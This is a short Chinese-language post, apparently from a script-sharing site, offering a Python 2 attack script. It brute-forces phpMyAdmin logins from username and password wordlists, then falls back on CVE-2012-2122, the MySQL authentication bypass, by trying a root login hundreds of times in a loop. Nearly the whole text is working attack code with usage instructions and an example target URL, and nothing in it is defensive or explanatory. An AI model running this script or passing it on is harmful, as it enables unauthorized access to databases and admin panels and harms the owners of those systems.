phpMyAdmin 暴力破解脚本,并附带 CVE-2012-2122(MySQL Authentication Bypass Vulnerability)漏洞的利用。
#!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) headers = {\'User-Agent\' : \'Mozilla/5.0 (Windows NT 6.1; WOW64)\'} params = urllib.urlencode({\'pma_username\': username, \'pma_password\': password}) request = urllib2.Request(url+\"/index.php\", params,headers) response = opener.open(request) a=response.read() if a.find(\'Database server\')!=-1 and a.find(\'name=\"login_form\"\')==-1: return username,password return 0 def MySQLAuthenticationBypassCheck(host,port): i=0 while i<300: i=i+1 subprocess.Popen(\"mysql --host=%s -P %s -uroot -piswin\" % (host,port),shell=True).wait() if __name__ == \'__main__\': if len(sys.argv)<4: print \"#author:iswin\\n#useage python pma.py http://www.jb51.net/phpmyadmin/ username.txt password.txt\" sys.exit() print \"Bruting,Pleas wait...\" for name in open(sys.argv[2],\"r\"): for passw in open(sys.argv[3],\"r\"): state=Crack(sys.argv[1],name,passw) if state!=0: print \"\\nBrute successful\" print \"UserName: \"+state[0]+\"PassWord: \"+state[1] sys.exit() print \"Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck\" choice=raw_input(\'Warning:This function needs mysql environment.\\nY:Try to MySQLAuthenticationBypassCheck\\nOthers:Exit\\n\') if choice==\'Y\' or choice==\'y\': host=raw_input(\'Host:\') port=raw_input(\'Port:\') MySQLAuthenticationBypassCheck(host,port)